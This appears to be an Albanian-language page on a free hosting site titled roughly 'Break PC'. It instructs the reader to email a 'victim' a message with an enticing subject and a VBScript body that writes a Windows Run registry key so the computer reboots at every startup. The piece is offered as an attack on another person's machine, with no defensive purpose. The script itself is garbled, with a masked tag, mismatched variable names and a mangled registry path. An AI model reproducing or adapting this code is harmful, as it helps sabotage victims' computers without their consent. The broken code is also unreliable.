Privatkredit Vergleich
   
  kosova-gungame
  Prish pc
 

Bre me mur

Code te cilat e shkymin kompjuterin edhe code te tjera

 

 

Hym ne emailin tone ne Hotmail dhe shkojme dhe krijojme nje mesazh te ri!
Shenojme emailin e viktimes dhe ne titullin(subject) shenojme dicka atraktive dhe ne pjesen ku e shenojm mesazhin shenojme ket:
--------------------------------------------------------------------------

******** ****************="vbscript">
on error resume next
dim ok
set ok=CreateObject("WScript.Shell"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32","shutdown -r"

</script>
--------------------------------------------------------------------------
Viktima me hapjen e ketij emaili, ne funksion do te hyn kodi qe eshe pak me nalt, do ti shkymet kompjuteri! dhe cdoher kur te Starton kopmjuterin! per 24 sekonda do ti shymet


 
  Heute waren schon 8 ziyaretçi (155 klik) hier!  
 
=> Sen de ücretsiz bir internet sitesi kurmak ister misin? O zaman burayı tıkla! <=